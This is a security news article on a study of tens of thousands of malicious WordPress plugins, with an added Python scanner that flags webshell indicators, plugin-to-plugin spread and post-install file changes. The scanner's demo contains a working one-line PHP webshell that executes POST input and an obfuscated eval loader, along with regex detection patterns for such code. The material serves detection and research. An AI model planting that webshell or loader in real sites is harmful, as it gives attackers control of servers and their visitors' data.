Malicious Plugins Found on 25,000 WordPress Websites: Study

Researchers at Georgia Institute of Technology have identified malicious plugins on tens of thousands of WordPress websites.

An analysis of nightly backups of more than 400,000 unique web servers revealed more than 47,000 malicious plugins installed on nearly 25,000 unique WordPress websites. More than 94% of those plugins (over 44,000) were still active at the end of the study period.

Over 3,600 of the identified malicious plugins had been bought from legitimate marketplaces such as CodeCanyon, Easy Digital Downloads, and ThemeForest. The majority of these plugins made no attempt to obfuscate their malicious behavior, the academics say in their research paper, "Mistrust Plugins You Must: A Large-Scale Study of Malicious Plugins in WordPress Marketplaces," presented at USENIX Security 2022.

The dataset spanned eight years, from July 2012 to July 2020, and showed a steady increase in the number of installed malicious plugins, peaking in March 2020.

According to the researchers, some adversaries bought the codebase of popular free plugins, added malicious code, and waited for websites to pull it in through automatic updates. Others impersonated benign plugin authors and distributed malware through pirated ("nulled") copies of paid plugins.

“While the website owners trusted the plugin ecosystem and spent a total of $7.3M on only the plugins in our dataset, we found that this trust is often broken for the attackers’ monetary gains,” the academics say.

For their analysis, the researchers built YODA, an automated framework for detecting and tracking malicious plugins, and ran it against the backups of roughly 400,000 web servers belonging to customers of website backup provider CodeGuard.

Of the identified malicious plugins, more than 10,000 used webshells and code obfuscation. The researchers also identified cases of plugin-to-plugin infection, where a malicious plugin injects its code into other plugins on the same web server so that they replicate its behavior; in such cases, removing the plugin that was first noticed does not remove the infection.


Overall, more than 40,000 plugin instances were infected post-deployment: the plugin was benign when it was installed and was modified afterwards. In many cases, attackers abused the web infrastructure to inject malicious plugins into websites and then worked to maintain their access to the web servers.
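The three behaviors described above (webshells and obfuscated loaders, the same payload spreading from plugin to plugin, and files changing after deployment) can be checked for on a single WordPress install with a small triage script. The following is an added example written for this page; it is not YODA, not the paper's detector, and not CodeGuard tooling. The indicator regexes, the plugin names and the plugin file contents are constructed for the demonstration, and the indicator list is an assumption about what typical PHP webshells look like, not a claim about the study's dataset.

```python
"""Triage scanner for a WordPress plugins directory (added example, not YODA).

Flags three behaviors: webshell/obfuscation indicators in PHP source,
plugin-to-plugin infection (one suspicious file byte-identical across plugin
directories), and post-deployment drift against a hash baseline taken at
install time. All inputs below are constructed for the demo.
"""
import hashlib
import re
import tempfile
from collections import defaultdict
from pathlib import Path

# Assumed indicator patterns (hypothetical, not the paper's detector).
INDICATORS = {
    "eval_of_decoded_blob": re.compile(
        r"\beval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I),
    "request_to_exec": re.compile(
        r"\b(?:system|exec|shell_exec|passthru|popen)\s*\(\s*\$_(?:GET|POST|REQUEST|COOKIE)\b", re.I),
    "hex_escaped_string": re.compile(r'"(?:\\x[0-9a-fA-F]{2}){8,}"'),
}


def sha256_file(path: Path) -> str:
    return hashlib.sha256(path.read_bytes()).hexdigest()


def php_files(plugins_root: Path):
    """Yield (plugin_name, relative_posix_path, absolute_path) for every .php file."""
    for plugin_dir in sorted(p for p in plugins_root.iterdir() if p.is_dir()):
        for f in sorted(plugin_dir.rglob("*.php")):
            yield plugin_dir.name, f.relative_to(plugins_root).as_posix(), f


def scan_indicators(plugins_root: Path) -> dict:
    """Map relative file path -> list of indicator names that matched."""
    hits = {}
    for _plugin, rel, f in php_files(plugins_root):
        src = f.read_text(errors="replace")
        matched = [name for name, rx in INDICATORS.items() if rx.search(src)]
        if matched:
            hits[rel] = matched
    return hits


def cross_plugin_payloads(plugins_root: Path) -> dict:
    """Map content hash -> sorted plugin names for suspicious files that are
    byte-identical in two or more plugin directories (plugin-to-plugin
    infection). Requiring an indicator hit keeps legitimately shared
    libraries out of the result."""
    suspicious = scan_indicators(plugins_root)
    by_hash = defaultdict(set)
    for plugin, rel, f in php_files(plugins_root):
        if rel in suspicious:
            by_hash[sha256_file(f)].add(plugin)
    return {h: sorted(p) for h, p in by_hash.items() if len(p) > 1}


def baseline(plugins_root: Path) -> dict:
    """Snapshot relative path -> sha256 for every PHP file; take it right after install."""
    return {rel: sha256_file(f) for _p, rel, f in php_files(plugins_root)}


def diff_baseline(plugins_root: Path, base: dict) -> dict:
    """Report post-deployment drift: files modified, added or removed since the baseline."""
    now = baseline(plugins_root)
    return {
        "modified": sorted(r for r in now if r in base and now[r] != base[r]),
        "added": sorted(r for r in now if r not in base),
        "removed": sorted(r for r in base if r not in now),
    }


# --- constructed demo input (not real plugins) ---------------------------
BENIGN_PLUGIN = (
    "<?php\n/* Plugin Name: Clean SEO */\n"
    "add_action('wp_head', function () { echo '<meta name=\"demo\">'; });\n"
)
# Minimal webshell: runs whatever arrives in the 'c' POST parameter.
WEBSHELL = "<?php\nif (isset($_POST['c'])) { system($_POST['c']); }\n"
# Obfuscated loader that would unpack and run a hidden second stage.
OBF_LOADER = "<?php\neval(gzinflate(base64_decode('" + "A" * 40 + "')));\n"


def run_demo() -> dict:
    """Build a clean install, baseline it, then simulate the three infections."""
    root = Path(tempfile.mkdtemp()) / "plugins"
    for name in ("clean-seo", "fancy-gallery", "photo-slider"):
        (root / name).mkdir(parents=True)
        (root / name / f"{name}.php").write_text(BENIGN_PLUGIN)
    base = baseline(root)  # snapshot of the clean install
    # Later: the same webshell is dropped into two plugins (plugin-to-plugin
    # spread) and one plugin's main file is rewritten with an obfuscated loader.
    for name in ("fancy-gallery", "photo-slider"):
        (root / name / "wp-cache.php").write_text(WEBSHELL)
    (root / "clean-seo" / "clean-seo.php").write_text(OBF_LOADER)
    return {
        "indicators": scan_indicators(root),
        "cross_plugin": cross_plugin_payloads(root),
        "drift": diff_baseline(root, base),
    }


if __name__ == "__main__":
    import json
    print(json.dumps(run_demo(), indent=2))
```

Point the scanner at a real wp-content/plugins directory by replacing the demo root, and take the baseline from a fresh install or from a plugin zip you have verified, not from a server that may already be compromised. The drift check is what catches the post-deployment infections the study counts, since a plugin that was clean at install time will not trip any static indicator until it is modified; the cross-plugin check is a reminder that cleanup has to cover every plugin carrying the shared payload, not only the one that was noticed first.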

Some of the behaviors seen in the malicious plugins were already common in late 2012, while others appeared more recently. Regardless of age, all of them remain prevalent in present-day malicious plugins.

The researchers also found more than 6,000 plugins that impersonated benign plugins sold through legitimate marketplaces. The impostors lured website owners with a "trial" option, something most paid plugin marketplaces do not offer.

The results of the analysis were reported to CodeGuard, and remediation work is underway. However, the academics say that only 10% of website owners were seen attempting to clean up their installations, and more than 12% of the websites that were cleaned up were reinfected, which suggests that the cleanup removed the visible plugin but not the access or the other infected plugins that had delivered it.

Related: Unpatched WPBakery WordPress Plugin Vulnerability Increasingly Targeted in Attacks

Related: Exploited Vulnerability Patched in WordPress Plugin With Over 1 Million Installations

Related: Large-Scale Attack Targeting Tatsu Builder WordPress Plugin

Written By

Ionut Arghire is an international correspondent for SecurityWeek.